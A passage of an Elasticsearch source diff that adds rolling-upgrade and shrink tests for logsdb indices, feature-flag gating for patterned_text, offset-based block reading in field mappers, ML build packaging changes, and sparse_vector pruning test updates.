MatchOnlyTextRollingUpgradeIT extends AbstractRollingUpgradeWithSecurityTestCase { + + static String BULK_ITEM_TEMPLATE = + """ + {"@timestamp": "$now", "host.name": "$host", "method": "$method", "ip": "$ip", "message": "$message", "length": $length, "factor": $factor} + """; + + private static final String TEMPLATE = """ + { + "mappings": { + "properties": { + "@timestamp" : { + "type": "date" + }, + "method": { + "type": "keyword" + }, + "message": { + "type": "match_only_text" + }, + "ip": { + "type": "ip" + }, + "length": { + "type": "long" + }, + "factor": { + "type": "double" + } + } + } + }"""; + + public MatchOnlyTextRollingUpgradeIT(@Name("upgradedNodes") int upgradedNodes) { + super(upgradedNodes); + } + + public void testIndexing() throws Exception { + String dataStreamName = "logs-bwc-test"; + if (isOldCluster()) { + startTrial(); + enableLogsdbByDefault(); + createTemplate(dataStreamName, getClass().getSimpleName().toLowerCase(Locale.ROOT), TEMPLATE); + + Instant startTime = Instant.now().minusSeconds(60 * 60); + bulkIndex(dataStreamName, 4, 1024, startTime); + + String firstBackingIndex = getWriteBackingIndex(client(), dataStreamName, 0); + var settings = (Map) getIndexSettingsWithDefaults(firstBackingIndex).get(firstBackingIndex); + assertThat(((Map) settings.get("settings")).get("index.mode"), equalTo("logsdb")); + assertThat(((Map) settings.get("defaults")).get("index.mapping.source.mode"), equalTo("SYNTHETIC")); + + ensureGreen(dataStreamName); + search(dataStreamName); + query(dataStreamName); + } else if (isMixedCluster()) { + Instant startTime = Instant.now().minusSeconds(60 * 30); + bulkIndex(dataStreamName, 4, 1024, startTime); + + ensureGreen(dataStreamName); + search(dataStreamName); + query(dataStreamName); + } else if (isUpgradedCluster()) { + ensureGreen(dataStreamName); + Instant startTime = Instant.now(); + bulkIndex(dataStreamName, 4, 1024, startTime); + search(dataStreamName); + query(dataStreamName); + + var forceMergeRequest = new Request("POST", "/" + dataStreamName + "/_forcemerge"); + forceMergeRequest.addParameter("max_num_segments", "1"); + assertOK(client().performRequest(forceMergeRequest)); + + ensureGreen(dataStreamName); + search(dataStreamName); + query(dataStreamName); + } + } + + static void createTemplate(String dataStreamName, String id, String template) throws IOException { + final String INDEX_TEMPLATE = """ + { + 
"index_patterns": ["$DATASTREAM"], + "template": $TEMPLATE, + "data_stream": { + } + }"""; + var putIndexTemplateRequest = new Request("POST", "/_index_template/" + id); + putIndexTemplateRequest.setJsonEntity(INDEX_TEMPLATE.replace("$TEMPLATE", template).replace("$DATASTREAM", dataStreamName)); + assertOK(client().performRequest(putIndexTemplateRequest)); + } + + static String bulkIndex(String dataStreamName, int numRequest, int numDocs, Instant startTime) throws Exception { + String firstIndex = null; + for (int i = 0; i < numRequest; i++) { + var bulkRequest = new Request("POST", "/" + dataStreamName + "/_bulk"); + StringBuilder requestBody = new StringBuilder(); + for (int j = 0; j < numDocs; j++) { + String hostName = "host" + j % 50; // Not realistic, but makes asserting search / query response easier. + String methodName = "method" + j % 5; + String ip = NetworkAddress.format(randomIp(true)); + String param = "chicken" + randomInt(5); + String message = "the quick brown fox jumps over the " + param; + long length = randomLong(); + double factor = randomDouble(); + + requestBody.append("{\"create\": {}}"); + requestBody.append('\n'); + requestBody.append( + BULK_ITEM_TEMPLATE.replace("$now", formatInstant(startTime)) + .replace("$host", hostName) + .replace("$method", methodName) + .replace("$ip", ip) + .replace("$message", message) + .replace("$length", Long.toString(length)) + .replace("$factor", Double.toString(factor)) + ); + requestBody.append('\n'); + + startTime = startTime.plusMillis(1); + } + bulkRequest.setJsonEntity(requestBody.toString()); + bulkRequest.addParameter("refresh", "true"); + var response = client().performRequest(bulkRequest); + assertOK(response); + var responseBody = entityAsMap(response); + assertThat("errors in response:\n " + responseBody, responseBody.get("errors"), equalTo(false)); + if (firstIndex == null) { + firstIndex = (String) ((Map) ((Map) ((List) responseBody.get("items")).get(0)).get("create")).get("_index"); + } + } + return firstIndex; + } + + void search(String dataStreamName) throws Exception { + var searchRequest = new Request("POST", "/" + dataStreamName + "/_search"); + searchRequest.addParameter("pretty", "true"); + searchRequest.setJsonEntity(""" + { + "size": 500, + "query": { + "match_phrase": { + "message": "chicken" + } + } + } + """.replace("chicken", "chicken" + randomInt(5))); + var response = client().performRequest(searchRequest); + assertOK(response); + var responseBody = entityAsMap(response); + logger.info("{}", responseBody); + + Integer totalCount = ObjectPath.evaluate(responseBody, "hits.total.value"); + assertThat(totalCount, greaterThanOrEqualTo(512)); + } + + void query(String dataStreamName) throws Exception { + var queryRequest = new Request("POST", "/_query"); + queryRequest.addParameter("pretty", "true"); + queryRequest.setJsonEntity(""" + { + "query": "FROM $ds | STATS max(length), max(factor) BY message | SORT message | LIMIT 5" + } + """.replace("$ds", dataStreamName)); + var response = client().performRequest(queryRequest); + assertOK(response); + var responseBody = entityAsMap(response); + logger.info("{}", responseBody); + + String column1 = ObjectPath.evaluate(responseBody, "columns.0.name"); + String column2 = ObjectPath.evaluate(responseBody, "columns.1.name"); + String column3 = ObjectPath.evaluate(responseBody, "columns.2.name"); + assertThat(column1, equalTo("max(length)")); + assertThat(column2, equalTo("max(factor)")); + assertThat(column3, equalTo("message")); + + String key = 
ObjectPath.evaluate(responseBody, "values.0.2"); + assertThat(key, equalTo("the quick brown fox jumps over the chicken0")); + Long maxLength = ObjectPath.evaluate(responseBody, "values.0.0"); + assertThat(maxLength, notNullValue()); + Double maxFactor = ObjectPath.evaluate(responseBody, "values.0.1"); + assertThat(maxFactor, notNullValue()); + } + + protected static void startTrial() throws IOException { + Request startTrial = new Request("POST", "/_license/start_trial"); + startTrial.addParameter("acknowledge", "true"); + try { + assertOK(client().performRequest(startTrial)); + } catch (ResponseException e) { + var responseBody = entityAsMap(e.getResponse()); + String error = ObjectPath.evaluate(responseBody, "error_message"); + assertThat(error, containsString("Trial was already activated.")); + } + } + + static Map<String, Object> getIndexSettingsWithDefaults(String index) throws IOException { + Request request = new Request("GET", "/" + index + "/_settings"); + request.addParameter("flat_settings", "true"); + request.addParameter("include_defaults", "true"); + Response response = client().performRequest(request); + try (InputStream is = response.getEntity().getContent()) { + return XContentHelper.convertToMap( + XContentType.fromMediaType(response.getEntity().getContentType().getValue()).xContent(), + is, + true + ); + } + } + + static String formatInstant(Instant instant) { + return DateFormatter.forPattern(FormatNames.STRICT_DATE_OPTIONAL_TIME.getName()).format(instant); + } + +} diff --git a/x-pack/plugin/logsdb/src/internalClusterTest/java/org/elasticsearch/xpack/logsdb/LogsIndexingIT.java b/x-pack/plugin/logsdb/src/internalClusterTest/java/org/elasticsearch/xpack/logsdb/LogsIndexingIT.java index 82c8d9f5243d5..bea3b7343de3b 100644 --- a/x-pack/plugin/logsdb/src/internalClusterTest/java/org/elasticsearch/xpack/logsdb/LogsIndexingIT.java +++ b/x-pack/plugin/logsdb/src/internalClusterTest/java/org/elasticsearch/xpack/logsdb/LogsIndexingIT.java @@ -11,11 +11,13 @@ import org.elasticsearch.action.admin.indices.refresh.RefreshRequest; import org.elasticsearch.action.admin.indices.settings.get.GetSettingsRequest; import org.elasticsearch.action.admin.indices.settings.get.GetSettingsResponse; +import org.elasticsearch.action.admin.indices.shrink.ResizeType; import org.elasticsearch.action.admin.indices.template.put.TransportPutComposableIndexTemplateAction; import org.elasticsearch.action.bulk.BulkRequest; import org.elasticsearch.action.get.GetRequest; import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.search.SearchRequest; +import org.elasticsearch.action.support.WriteRequest; import org.elasticsearch.cluster.metadata.ComposableIndexTemplate; import org.elasticsearch.cluster.metadata.Template; import org.elasticsearch.common.compress.CompressedXContent; @@ -35,6 +37,8 @@ import java.util.List; import java.util.UUID; +import static org.elasticsearch.index.mapper.DateFieldMapper.DEFAULT_DATE_TIME_FORMATTER; +import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertNoFailures; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertResponse; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.is; @@ -206,6 +210,38 @@ private void checkIndexSearchAndRetrieval(String dataStreamName, boolean routeOn }); } + public void testShrink() throws Exception { + client().admin() + .indices() + .prepareCreate("my-logs") + .setMapping("@timestamp", "type=date", "host.name", "type=keyword") + .setSettings(indexSettings(between(3, 5),
0).put("index.mode", "logsdb").put("index.sort.field", "host.name")) + .get(); + + long timestamp = DEFAULT_DATE_TIME_FORMATTER.parseMillis("2025-08-08T00:00:00Z"); + BulkRequest bulkRequest = new BulkRequest("my-logs"); + int numDocs = randomIntBetween(100, 10_000); + for (int i = 0; i < numDocs; i++) { + timestamp += randomIntBetween(0, 1000); + String field = "field-" + randomIntBetween(1, 20); + bulkRequest.add( + new IndexRequest("my-logs").id(Integer.toString(i)) + .source("host.name", "host-" + between(1, 5), "@timestamp", timestamp, field, randomNonNegativeLong()) + ); + } + bulkRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().bulk(bulkRequest).actionGet(); + client().admin().indices().prepareFlush("my-logs").get(); + client().admin().indices().prepareUpdateSettings("my-logs").setSettings(Settings.builder().put("index.blocks.write", true)).get(); + client().admin() + .indices() + .prepareResizeIndex("my-logs", "shrink-my-logs") + .setResizeType(ResizeType.SHRINK) + .setSettings(indexSettings(1, 0).build()) + .get(); + assertNoFailures(client().admin().indices().prepareForceMerge("shrink-my-logs").setMaxNumSegments(1).setFlush(true).get()); + } + static String formatInstant(Instant instant) { return DateFormatter.forPattern(FormatNames.STRICT_DATE_OPTIONAL_TIME.getName()).format(instant); } diff --git a/x-pack/plugin/logsdb/src/javaRestTest/java/org/elasticsearch/xpack/logsdb/qa/StandardVersusLogsIndexModeChallengeRestIT.java b/x-pack/plugin/logsdb/src/javaRestTest/java/org/elasticsearch/xpack/logsdb/qa/StandardVersusLogsIndexModeChallengeRestIT.java index 737fe5693215a..c9a25764002cd 100644 --- a/x-pack/plugin/logsdb/src/javaRestTest/java/org/elasticsearch/xpack/logsdb/qa/StandardVersusLogsIndexModeChallengeRestIT.java +++ b/x-pack/plugin/logsdb/src/javaRestTest/java/org/elasticsearch/xpack/logsdb/qa/StandardVersusLogsIndexModeChallengeRestIT.java @@ -55,7 +55,7 @@ public abstract class StandardVersusLogsIndexModeChallengeRestIT extends Abstrac protected final DataGenerationHelper dataGenerationHelper; public StandardVersusLogsIndexModeChallengeRestIT() { - this(new DataGenerationHelper()); + this(new DataGenerationHelper(builder -> builder.withMaxFieldCountPerLevel(30))); } protected StandardVersusLogsIndexModeChallengeRestIT(DataGenerationHelper dataGenerationHelper) { diff --git a/x-pack/plugin/logsdb/src/test/java/org/elasticsearch/xpack/logsdb/patternedtext/PatternedTextFieldMapperTests.java b/x-pack/plugin/logsdb/src/test/java/org/elasticsearch/xpack/logsdb/patternedtext/PatternedTextFieldMapperTests.java index 2a707eafa285d..9b572e171bd96 100644 --- a/x-pack/plugin/logsdb/src/test/java/org/elasticsearch/xpack/logsdb/patternedtext/PatternedTextFieldMapperTests.java +++ b/x-pack/plugin/logsdb/src/test/java/org/elasticsearch/xpack/logsdb/patternedtext/PatternedTextFieldMapperTests.java @@ -40,6 +40,7 @@ import org.elasticsearch.xcontent.XContentFactory; import org.elasticsearch.xpack.logsdb.LogsDBPlugin; import org.junit.AssumptionViolatedException; +import org.junit.Before; import java.io.IOException; import java.util.Collection; @@ -72,6 +73,11 @@ protected void assertExistsQuery(MappedFieldType fieldType, Query query, LuceneD assertNoFieldNamesField(fields); } + @Before + public void setup() { + assumeTrue("Only when patterned_text feature flag is enabled", PatternedTextFieldMapper.PATTERNED_TEXT_MAPPER.isEnabled()); + } + public void testExistsStandardSource() throws IOException { assertExistsQuery(createMapperService(fieldMapping(b -> 
b.field("type", "patterned_text")))); } diff --git a/x-pack/plugin/logsdb/src/yamlRestTest/java/org/elasticsearch/xpack/logsdb/LogsdbTestSuiteIT.java b/x-pack/plugin/logsdb/src/yamlRestTest/java/org/elasticsearch/xpack/logsdb/LogsdbTestSuiteIT.java index acb146d2af542..72ba813055083 100644 --- a/x-pack/plugin/logsdb/src/yamlRestTest/java/org/elasticsearch/xpack/logsdb/LogsdbTestSuiteIT.java +++ b/x-pack/plugin/logsdb/src/yamlRestTest/java/org/elasticsearch/xpack/logsdb/LogsdbTestSuiteIT.java @@ -10,6 +10,7 @@ import com.carrotsearch.randomizedtesting.annotations.Name; import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; +import org.elasticsearch.Build; import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.ThreadContext; @@ -20,6 +21,9 @@ import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; import org.junit.ClassRule; +import java.util.ArrayList; +import java.util.List; + public class LogsdbTestSuiteIT extends ESClientYamlSuiteTestCase { private static final String USER = "test_admin"; @@ -34,6 +38,7 @@ public class LogsdbTestSuiteIT extends ESClientYamlSuiteTestCase { .setting("xpack.license.self_generated.type", "trial") .feature(FeatureFlag.DOC_VALUES_SKIPPER) .feature(FeatureFlag.USE_LUCENE101_POSTINGS_FORMAT) + .feature(FeatureFlag.PATTERNED_TEXT) .build(); public LogsdbTestSuiteIT(@Name("yaml") ClientYamlTestCandidate testCandidate) { @@ -42,7 +47,19 @@ public LogsdbTestSuiteIT(@Name("yaml") ClientYamlTestCandidate testCandidate) { @ParametersFactory public static Iterable parameters() throws Exception { - return ESClientYamlSuiteTestCase.createParameters(); + // Filter out 52_esql_insist_operator_synthetic_source.yml suite for snapshot builds: + // (esql doesn't use feature flags and all experimental features are just enabled if build is snapshot) + + List filtered = new ArrayList<>(); + for (Object[] params : ESClientYamlSuiteTestCase.createParameters()) { + ClientYamlTestCandidate candidate = (ClientYamlTestCandidate) params[0]; + if (candidate.getRestTestSuite().getName().equals("52_esql_insist_operator_synthetic_source") + && Build.current().isSnapshot() == false) { + continue; + } + filtered.add(new Object[] { candidate }); + } + return filtered; } @Override diff --git a/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/10_basic.yml b/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/10_basic.yml index e25a2d2e76a76..ba462b9db8ab7 100644 --- a/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/10_basic.yml +++ b/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/10_basic.yml @@ -1,4 +1,7 @@ setup: + - requires: + cluster_features: [ "mapper.patterned_text" ] + reason: "patterned_text mappings are used in this test" - do: indices.create: diff --git a/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/20_synthetic_source.yml b/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/20_synthetic_source.yml index a21ee18ac6424..67f2de4b31332 100644 --- a/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/20_synthetic_source.yml +++ b/x-pack/plugin/logsdb/src/yamlRestTest/resources/rest-api-spec/test/patternedtext/20_synthetic_source.yml @@ -1,3 +1,9 @@ +setup: + - requires: + cluster_features: [ "mapper.patterned_text" ] + reason: "patterned_text 
mappings are used in this test" + +--- simple: - do: indices.create: diff --git a/x-pack/plugin/mapper-aggregate-metric/src/main/java/org/elasticsearch/xpack/aggregatemetric/mapper/AggregateMetricDoubleFieldMapper.java b/x-pack/plugin/mapper-aggregate-metric/src/main/java/org/elasticsearch/xpack/aggregatemetric/mapper/AggregateMetricDoubleFieldMapper.java index 5eafb858eacbe..3658313642700 100644 --- a/x-pack/plugin/mapper-aggregate-metric/src/main/java/org/elasticsearch/xpack/aggregatemetric/mapper/AggregateMetricDoubleFieldMapper.java +++ b/x-pack/plugin/mapper-aggregate-metric/src/main/java/org/elasticsearch/xpack/aggregatemetric/mapper/AggregateMetricDoubleFieldMapper.java @@ -571,20 +571,24 @@ public String toString() { } @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - try (var builder = factory.aggregateMetricDoubleBuilder(docs.count())) { - copyDoubleValuesToBuilder(docs, builder.min(), minValues); - copyDoubleValuesToBuilder(docs, builder.max(), maxValues); - copyDoubleValuesToBuilder(docs, builder.sum(), sumValues); - copyIntValuesToBuilder(docs, builder.count(), valueCountValues); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (var builder = factory.aggregateMetricDoubleBuilder(docs.count() - offset)) { + copyDoubleValuesToBuilder(docs, offset, builder.min(), minValues); + copyDoubleValuesToBuilder(docs, offset, builder.max(), maxValues); + copyDoubleValuesToBuilder(docs, offset, builder.sum(), sumValues); + copyIntValuesToBuilder(docs, offset, builder.count(), valueCountValues); return builder.build(); } } - private void copyDoubleValuesToBuilder(Docs docs, BlockLoader.DoubleBuilder builder, NumericDocValues values) - throws IOException { + private void copyDoubleValuesToBuilder( + Docs docs, + int offset, + BlockLoader.DoubleBuilder builder, + NumericDocValues values + ) throws IOException { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -600,10 +604,10 @@ private void copyDoubleValuesToBuilder(Docs docs, BlockLoader.DoubleBuilder buil } } - private void copyIntValuesToBuilder(Docs docs, BlockLoader.IntBuilder builder, NumericDocValues values) + private void copyIntValuesToBuilder(Docs docs, int offset, BlockLoader.IntBuilder builder, NumericDocValues values) throws IOException { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); diff --git a/x-pack/plugin/mapper-constant-keyword/src/main/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapper.java b/x-pack/plugin/mapper-constant-keyword/src/main/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapper.java index 5a667df9ffbbf..2102aaaa72cb6 100644 --- a/x-pack/plugin/mapper-constant-keyword/src/main/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapper.java +++ b/x-pack/plugin/mapper-constant-keyword/src/main/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapper.java @@ -212,6 +212,11 @@ protected boolean matches(String pattern, boolean caseInsensitive, QueryRewriteC return Regex.simpleMatch(pattern, value, caseInsensitive); } + @Override + public String 
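The `offset` parameter threaded through `read(...)` above changes the reader contract: a column reader now fills positions `docs[offset..count)` instead of always starting at zero, so a caller can resume a partially built page. A self-contained sketch of that loop shape, using a hypothetical `readLongs` helper rather than the real `BlockLoader` API:

```java
import java.util.Arrays;
import java.util.function.IntToLongFunction;

// Hypothetical stand-in for the offset-based copy loops above
// (copyDoubleValuesToBuilder / copyIntValuesToBuilder): positions before
// `offset` are assumed to have been read already, and doc IDs must ascend.
final class OffsetReadSketch {
    static long[] readLongs(int[] docs, int offset, IntToLongFunction valueForDoc) {
        long[] out = new long[docs.length - offset];
        int lastDoc = -1;
        for (int i = offset; i < docs.length; i++) {
            int doc = docs[i];
            if (doc < lastDoc) {
                throw new IllegalStateException("docs within same block must be in order");
            }
            out[i - offset] = valueForDoc.applyAsLong(doc);
            lastDoc = doc;
        }
        return out;
    }

    public static void main(String[] args) {
        // Resume at position 2 of a 5-doc page; only docs 7, 8 and 9 are read.
        long[] values = readLongs(new int[] { 3, 5, 7, 8, 9 }, 2, doc -> doc * 10L);
        System.out.println(Arrays.toString(values)); // [70, 80, 90]
    }
}
```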
getConstantFieldValue(SearchExecutionContext context) { + return value; + } + @Override public Query existsQuery(SearchExecutionContext context) { return value != null ? new MatchAllDocsQuery() : new MatchNoDocsQuery(); diff --git a/x-pack/plugin/mapper-constant-keyword/src/test/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapperTests.java b/x-pack/plugin/mapper-constant-keyword/src/test/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapperTests.java index c0c2db53b97e9..1a94ca1b8d40a 100644 --- a/x-pack/plugin/mapper-constant-keyword/src/test/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapperTests.java +++ b/x-pack/plugin/mapper-constant-keyword/src/test/java/org/elasticsearch/xpack/constantkeyword/mapper/ConstantKeywordFieldMapperTests.java @@ -276,7 +276,7 @@ public FieldNamesFieldMapper.FieldNamesFieldType fieldNames() { iw.close(); try (DirectoryReader reader = DirectoryReader.open(directory)) { TestBlock block = (TestBlock) loader.columnAtATimeReader(reader.leaves().get(0)) - .read(TestBlock.factory(reader.numDocs()), new BlockLoader.Docs() { + .read(TestBlock.factory(), new BlockLoader.Docs() { @Override public int count() { return 1; @@ -286,7 +286,7 @@ public int count() { public int get(int i) { return 0; } - }); + }, 0); assertThat(block.get(0), nullValue()); } } diff --git a/x-pack/plugin/ml/build.gradle b/x-pack/plugin/ml/build.gradle index db87c27d30d21..fd63fe2eabb05 100644 --- a/x-pack/plugin/ml/build.gradle +++ b/x-pack/plugin/ml/build.gradle @@ -51,6 +51,14 @@ esplugin.bundleSpec.from { configurations.nativeBundle.files.collect { zipTree(it) } } +// this is required due to https://github.com/nebula-plugins/gradle-ospackage-plugin/issues/472 +// those lib files should not be executable in the first place +esplugin.bundleSpec.filesMatching("platform/**/lib/*") { details -> + details.permissions { + unix(0644) + } +} + // We don't ship the individual nativeBundle licenses - instead // they get combined into the top level NOTICES file we ship esplugin.bundleSpec.exclude 'platform/licenses/**' @@ -103,9 +111,9 @@ def mlCppVersion(){ (project.version + "-SNAPSHOT") : project.version; } -artifacts { - // normal es plugins do not publish the jar but we need to since users need it for extensions - archives tasks.named("jar") + +tasks.named('assemble').configure { + dependsOn tasks.named('jar') } tasks.register("extractNativeLicenses", Copy) { diff --git a/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/multi_cluster/50_sparse_vector.yml b/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/multi_cluster/50_sparse_vector.yml index c3255467ff443..80e4103045489 100644 --- a/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/multi_cluster/50_sparse_vector.yml +++ b/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/multi_cluster/50_sparse_vector.yml @@ -622,7 +622,7 @@ teardown: {"index": { "_id": "11" }} {"content_embedding":{"is": 0.6, "pugs": 0.6 }} {"index": { "_id": "12" }} - {"content_embedding":{"is": 0.1891394, "pugs": 0.1 }} + {"content_embedding":{"cats": 0.1 }} - do: search: @@ -633,13 +633,25 @@ teardown: field: content_embedding query_vector: pugs: 0.5 - cats: 0.5 - is: 0.04600334 + cats: 0.18 + is: 0.20 - match: { hits.total.value: 2 } - match: { hits.hits.0._id: "11" } - match: { hits.hits.1._id: "12" } + - do: + search: + 
index: test-sparse-vector-pruning-default + body: + query: + sparse_vector: + field: content_embedding + query_vector: + is: 0.21 # 0.2 is the weight threshold for the default pruning config + + - match: { hits.total.value: 11 } + - do: search: index: test-sparse-vector-pruning-default diff --git a/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/remote_cluster/50_sparse_vector.yml b/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/remote_cluster/50_sparse_vector.yml index 3014883e5b42a..cb789260f4e69 100644 --- a/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/remote_cluster/50_sparse_vector.yml +++ b/x-pack/plugin/ml/qa/multi-cluster-tests-with-security/src/test/resources/rest-api-spec/test/remote_cluster/50_sparse_vector.yml @@ -620,7 +620,7 @@ teardown: {"index": { "_id": "11" }} {"content_embedding":{"is": 0.6, "pugs": 0.6 }} {"index": { "_id": "12" }} - {"content_embedding":{"is": 0.1891394, "pugs": 0.1 }} + {"content_embedding":{"cats": 0.1 }} - do: search: @@ -631,13 +631,26 @@ teardown: field: content_embedding query_vector: pugs: 0.5 - cats: 0.5 - is: 0.04600334 + cats: 0.18 + is: 0.20 - match: { hits.total.value: 2 } - match: { hits.hits.0._id: "11" } - match: { hits.hits.1._id: "12" } + - do: + search: + index: test-sparse-vector-pruning-default + body: + query: + sparse_vector: + field: content_embedding + query_vector: + is: 0.21 # 0.2 is the weight threshold for the default pruning config + + - match: { hits.total.value: 11 } + + - do: search: index: test-sparse-vector-pruning-default diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlAnomaliesIndexUpdate.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlAnomaliesIndexUpdate.java index 26e0246312e1c..8067fcfde4ab4 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlAnomaliesIndexUpdate.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlAnomaliesIndexUpdate.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchStatusException; import org.elasticsearch.ResourceAlreadyExistsException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.admin.indices.alias.IndicesAliasesRequest; import org.elasticsearch.action.admin.indices.alias.IndicesAliasesRequestBuilder; @@ -41,6 +40,7 @@ import java.util.Arrays; import java.util.List; +import static org.elasticsearch.TransportVersions.ML_ROLLOVER_LEGACY_INDICES; import static org.elasticsearch.xpack.core.ClientHelper.ML_ORIGIN; import static org.elasticsearch.xpack.core.ml.utils.MlIndexAndAlias.FIRST_INDEX_SIX_DIGIT_SUFFIX; import static org.elasticsearch.xpack.core.ml.utils.MlIndexAndAlias.has6DigitSuffix; @@ -65,7 +65,7 @@ public MlAnomaliesIndexUpdate(IndexNameExpressionResolver expressionResolver, Cl public boolean isMinTransportVersionSupported(TransportVersion minTransportVersion) { // Automatic rollover does not require any new features // but wait for all nodes to be upgraded anyway - return minTransportVersion.onOrAfter(TransportVersions.ML_ROLLOVER_LEGACY_INDICES); + return minTransportVersion.onOrAfter(ML_ROLLOVER_LEGACY_INDICES); } @Override diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlIndexRollover.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlIndexRollover.java index 05eefe174dbab..e5613a6155294 
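For context on what the sparse_vector assertions above exercise: with the default pruning configuration, query tokens whose weight does not clear a cutoff (0.2, per the comment in these tests) are pruned from the query before scoring, which is why a token weighted 0.21 still matches while tokens at 0.18 or 0.20 contribute nothing on their own. Below is a minimal illustrative sketch of that thresholding step only; it is not Elasticsearch's actual pruning code, which is more involved (it also weighs token frequency statistics), and the class and constant names are invented for the example.

import java.util.Map;
import java.util.stream.Collectors;

final class SparseVectorPruningSketch {
    // Hypothetical cutoff mirroring the "0.2 is the weight threshold" comment in the YAML above.
    private static final float WEIGHT_THRESHOLD = 0.2f;

    /** Keeps only query tokens whose weight is strictly above the threshold. */
    static Map<String, Float> pruneQueryTokens(Map<String, Float> queryVector) {
        return queryVector.entrySet()
            .stream()
            .filter(e -> e.getValue() > WEIGHT_THRESHOLD)
            .collect(Collectors.toMap(Map.Entry::getKey, Map.Entry::getValue));
    }

    public static void main(String[] args) {
        // {is=0.21, pugs=0.5} survive pruning; cats=0.18 (or is=0.20) would be dropped from the query.
        System.out.println(pruneQueryTokens(Map.of("is", 0.21f, "cats", 0.18f, "pugs", 0.5f)));
    }
}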
100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlIndexRollover.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/MlIndexRollover.java @@ -10,7 +10,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ElasticsearchStatusException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.admin.indices.rollover.RolloverRequest; import org.elasticsearch.action.support.IndicesOptions; @@ -31,6 +30,7 @@ import java.util.ArrayList; import java.util.List; +import static org.elasticsearch.TransportVersions.ML_ROLLOVER_LEGACY_INDICES; import static org.elasticsearch.xpack.core.ClientHelper.ML_ORIGIN; /** @@ -60,7 +60,7 @@ public MlIndexRollover(List indicesToRollover, IndexNameEx public boolean isMinTransportVersionSupported(TransportVersion minTransportVersion) { // Wait for all nodes to be upgraded to ensure that the // newly created index will be of the latest version. - return minTransportVersion.onOrAfter(TransportVersions.ML_ROLLOVER_LEGACY_INDICES); + return minTransportVersion.supports(ML_ROLLOVER_LEGACY_INDICES); } @Override diff --git a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/action/TransportInferTrainedModelDeploymentAction.java b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/action/TransportInferTrainedModelDeploymentAction.java index c4915ef45c16d..0eb10aa33b9c7 100644 --- a/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/action/TransportInferTrainedModelDeploymentAction.java +++ b/x-pack/plugin/ml/src/main/java/org/elasticsearch/xpack/ml/action/TransportInferTrainedModelDeploymentAction.java @@ -12,6 +12,7 @@ import org.elasticsearch.action.FailedNodeException; import org.elasticsearch.action.TaskOperationFailure; import org.elasticsearch.action.support.ActionFilters; +import org.elasticsearch.action.support.ContextPreservingActionListener; import org.elasticsearch.action.support.tasks.TransportTasksAction; import org.elasticsearch.cluster.service.ClusterService; import org.elasticsearch.common.util.concurrent.AtomicArray; @@ -20,6 +21,7 @@ import org.elasticsearch.injection.guice.Inject; import org.elasticsearch.rest.RestStatus; import org.elasticsearch.tasks.CancellableTask; +import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.transport.TransportService; import 